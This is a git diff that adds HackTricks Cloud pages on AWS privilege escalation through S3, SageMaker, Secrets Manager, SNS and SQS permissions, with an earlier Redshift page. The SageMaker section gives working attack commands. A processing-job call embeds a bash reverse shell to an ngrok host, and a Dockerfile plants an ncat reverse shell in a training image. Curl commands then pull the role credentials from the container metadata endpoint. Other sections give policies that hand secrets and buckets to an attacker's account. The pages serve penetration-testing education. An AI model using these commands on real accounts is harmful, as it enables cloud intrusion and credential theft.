+As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like:
+
+```sql
+CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) 
+RETURNS INT 
+STABLE 
+LAMBDA 'lambda_function' 
+IAM_ROLE default;
+```
+
+### S3
+
+As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**:
+
+```sql
+# Read
+copy table from 's3://<your-bucket-name>/load/key_prefix' 
+credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
+region '<region>'
+options;
+
+# Write
+unload ('select * from venue')   
+to 's3://mybucket/tickit/unload/venue_' 
+iam_role default;
+```
+
+### Dynamo
+
+As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**:
+
+```sql
+copy favoritemovies 
+from 'dynamodb://ProductCatalog'
+iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
+```
+
+{% hint style="warning" %}
+The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located.
+{% endhint %}
+
+### EMR
+
+Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
+
+## References
+
+* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
new file mode 100644
index 0000000000..8850b9b144
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
@@ -0,0 +1,206 @@
+# AWS - S3 Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## S3
+
+### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject`
+
+An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges.
+
+For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy:
+
+```json
+{
+    "Version":"2012-10-17",
+    "Statement":[
+        {
+            "Effect":"Allow",
+            "Action":[
+                "s3:PutBucketNotification",
+                "s3:GetBucketNotification",
+                "s3:PutObject",
+                "s3:GetObject"],
+            "Resource":[
+                "arn:aws:s3:::cf-templates-*\/*",
+                "arn:aws:s3:::cf-templates-*"]
+        },
+        {
+            "Effect":"Allow",
+            "Action":"s3:ListAllMyBuckets",
+            "Resource":"*"
+        }]
+    }
+```
+
+And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**.
+
+![](<../../../.gitbook/assets/image (174).png>)
+
+The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\
+For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/)
+
+### `s3:PutObject`, `s3:GetObject` <a href="#s3putobject-s3getobject" id="s3putobject-s3getobject"></a>
+
+These are the permissions to **get and upload objects to S3**. Several services inside AWS (and outside of it) use S3 storage to store **config files**.\
+An attacker with **read access** to them might find **sensitive information** on them.\
+An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\
+These are some examples:
+
+* If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**.
+
+### `s3:PutBucketPolicy`
+
+An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets.
+
+```bash
+# Update Bucket policy
+aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>
+
+## JSON giving permissions to a user and mantaining some previous root access
+{
+    "Id": "Policy1568185116930",
+    "Version":"2012-10-17",
+    "Statement":[
+        {
+            "Effect":"Allow",
+            "Principal":{
+                "AWS":"arn:aws:iam::123123123123:root"
+            },
+            "Action":"s3:ListBucket",
+            "Resource":"arn:aws:s3:::somebucketname"
+        },
+        {
+            "Effect":"Allow",
+            "Principal":{
+                "AWS":"arn:aws:iam::123123123123:user/username"
+            },
+            "Action":"s3:*",
+            "Resource":"arn:aws:s3:::somebucketname/*"
+        }
+    ]
+}
+
+## JSON Public policy example
+### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
+{
+  "Id": "Policy1568185116930",
+  "Version": "2012-10-17",
+  "Statement": [
+  {
+      "Sid": "Stmt1568184932403",
+      "Action": [
+        "s3:ListBucket"
+      ],
+      "Effect": "Allow",
+      "Resource": "arn:aws:s3:::welcome",
+      "Principal": "*"
+  },
+  {
+    "Sid": "Stmt1568185007451",
+    "Action": [
+      "s3:GetObject"
+    ],
+    "Effect": "Allow",
+    "Resource": "arn:aws:s3:::welcome/*",
+    "Principal": "*"
+  }
+  ]
+}
+```
+
+### `s3:GetBucketAcl`, `s3:PutBucketAcl`
+
+An attacker could abuse these permissions to **grant him more access** over specific buckets.\
+Note that the attacker doesn't need to be from the same account. Moreover the write access
+
+```bash
+# Update bucket ACL
+aws s3api get-bucket-acl --bucket <bucket-name>
+aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json
+
+##JSON ACL example
+## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
+{
+  "Owner": {
+    "DisplayName": "<DisplayName>",
+    "ID": "<ID>"
+  },
+  "Grants": [
+  {
+    "Grantee": {
+      "Type": "Group",
+      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+    },
+  "Permission": "FULL_CONTROL"
+  }
+  ]
+}
+## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
+```
+
+### `s3:GetObjectAcl`, `s3:PutObjectAcl`
+
+An attacker could abuse these permissions to grant him more access over specific objects inside buckets.
+
+```bash
+# Update bucket object ACL
+aws s3api get-object-acl --bucket <bucekt-name> --key flag 
+aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json
+
+##JSON ACL example
+## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
+{
+  "Owner": {
+    "DisplayName": "<DisplayName>",
+    "ID": "<ID>"
+  },
+  "Grants": [
+  {
+    "Grantee": {
+      "Type": "Group",
+      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+    },
+  "Permission": "FULL_CONTROL"
+  }
+  ]
+}
+## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
+```
+
+### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl`
+
+An attacker with these privileges is expected to be able to put an Acl to an specific object version
+
+```bash
+aws s3api get-object-acl --bucket <bucekt-name> --key flag
+aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
new file mode 100644
index 0000000000..b795ce1ff4
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -0,0 +1,141 @@
+# AWS - Sagemaker Privesc
+
+## AWS - Sagemaker Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
+
+Start creating a noteboook with the IAM Role to access attached to it:
+
+```bash
+aws sagemaker create-notebook-instance --notebook-instance-name example \
+    --instance-type ml.t2.medium \
+    --role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
+```
+
+The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready:
+
+```bash
+aws sagemaker create-presigned-notebook-instance-url \
+    --notebook-instance-name <name>
+```
+
+Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button.
+
+Now It's possible to access the metadata credentials of the IAM Role.
+
+**Potential Impact:** Privesc to the sagemaker service role specified.
+
+### `sagemaker:CreatePresignedNotebookInstanceUrl`
+
+If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**.
+
+```bash
+aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
+```
+
+**Potential Impact:** Privesc to the sagemaker service role attached.
+
+### `sagemaker:CreateProcessingJob,iam:PassRole`
+
+An attacker with those permissions can make **sagemaker execute a processingjob** with a sagemaker role attached to it. The attacked can indicate the definition of the container that will be run in an **AWS managed ECS account instance**, and **steal the credentials of the IAM role attached**.
+
+```bash
+# I uploaded a python docker image to the ECR
+aws sagemaker create-processing-job \
+    --processing-job-name privescjob \
+    --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
+    --app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
+    --role-arn <sagemaker-arn-role>
+
+# In my tests it took 10min to receive the shell
+curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
+```
+
+**Potential Impact:** Privesc to the sagemaker service role specified.
+
+### `sagemaker:CreateTrainingJob`, `iam:PassRole`
+
+An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role.
+
+{% hint style="warning" %}
+This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job).
+
+```bash
+# Create docker image
+mkdir /tmp/rev
+## Note that the trainning job is going to call an executable called "train"
+## That's why I'm putting the rev shell in /bin/train
+## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
+cat > /tmp/rev/Dockerfile <<EOF
+FROM ubuntu
+RUN apt update && apt install -y ncat curl
+RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
+RUN chmod +x /bin/train
+CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
+EOF
+
+cd /tmp/rev
+sudo docker build . -t reverseshell
+
+# Upload it to ECR
+sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
+sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
+sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
+```
+{% endhint %}
+
+```bash
+# Create trainning job with the docker image created
+aws sagemaker create-training-job \
+    --training-job-name privescjob \
+    --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
+    --algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
+    --role-arn <role-arn> \
+    --output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
+    --stopping-condition '{"MaxRuntimeInSeconds": 600}'
+
+#To get the creds
+curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
+```
+
+**Potential Impact:** Privesc to the sagemaker service role specified.
+
+### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
+
+An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
+&#xNAN;_&#x49; haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
+
+## References
+
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
new file mode 100644
index 0000000000..8be266ddb6
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
@@ -0,0 +1,75 @@
+# AWS - Secrets Manager Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Secrets Manager
+
+For more info about secrets manager check:
+
+{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %}
+[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md)
+{% endcontent-ref %}
+
+### `secretsmanager:GetSecretValue`
+
+An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**.
+
+```bash
+aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
+```
+
+**Potential Impact:** Access high sensitive data inside AWS secrets manager service.
+
+### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)
+
+With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)).
+
+```bash
+aws secretsmanager list-secrets
+aws secretsmanager get-resource-policy --secret-id <secret_name>
+aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
+```
+
+policy.json:
+
+```json
+{
+  "Version" : "2012-10-17",
+  "Statement" : [ {
+    "Effect" : "Allow",
+    "Principal" : {
+      "AWS" : "arn:aws:iam::<attackers_account>:root"
+    },
+    "Action" : "secretsmanager:GetSecretValue",
+    "Resource" : "*"
+  } ]
+}
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
new file mode 100644
index 0000000000..bdbe2bea2e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
@@ -0,0 +1,71 @@
+# AWS - SNS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SNS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-sns-enum.md" %}
+[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
+{% endcontent-ref %}
+
+### `sns:Publish`
+
+An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+
+```bash
+aws sns publish --topic-arn <value> --message <value>
+```
+
+**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+
+### `sns:Subscribe`
+
+An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
+
+{% code overflow="wrap" %}
+```bash
+aws sns subscribe --topic-arn <value> --protocol <value> --endpoint <value>
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic.
+
+### `sns:AddPermission`
+
+An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions.
+
+```css
+aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <value> --action-name <value>
+```
+
+**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
new file mode 100644
index 0000000000..258084f11c
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
@@ -0,0 +1,74 @@
+# AWS - SQS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SQS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %}
+[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md)
+{% endcontent-ref %}
+
+### `sqs:AddPermission`
+
+An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
+
+{% code overflow="wrap" %}
+```bash
+cssCopy codeaws sqs add-permission --queue-url <value> --actions <value> --aws-account-ids <value> --label <value>
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
+
+### `sqs:SendMessage` , `sqs:SendMessageBatch`
+
+An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+
+```bash
+aws sqs send-message --queue-url <value> --message-body <value>
+aws sqs send-message-batch --queue-url <value> --entries <value>
+```
+
+**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+
+### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
+
+An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
+
+```bash
+aws sqs receive-message --queue-url <value>
+aws sqs delete-message --queue-url <value> --receipt-handle <value>
+aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> --visibility-timeout <value>
+```
+
+**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+
+{% hint style="success" %}
